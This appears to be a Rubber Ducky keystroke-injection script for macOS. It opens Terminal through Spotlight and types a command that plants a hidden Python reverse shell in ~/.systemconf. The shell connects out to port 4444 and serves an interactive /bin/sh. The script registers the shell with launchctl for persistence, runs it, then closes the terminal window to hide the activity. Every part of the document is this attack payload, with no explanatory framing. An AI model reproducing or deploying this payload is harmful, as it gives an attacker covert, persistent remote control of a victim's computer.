DELAY 1000
GUI SPACE
DELAY 1000
STRING terminal
DELAY 1000
ENTER
DELAY 1000
STRING mkdir -pv ~/.systemconf && echo '#!/bin/sh'"\npython -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"0.0.0.0\", 4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > ~/.systemconf/sysconf && chmod +x ~/.systemconf/sysconf && launchctl submit -l yes -p ~/.systemconf/sysconf && ~/.systemconf/sysconf & exit
ENTER
DELAY 500
GUI q
DELAY 500
GUI w
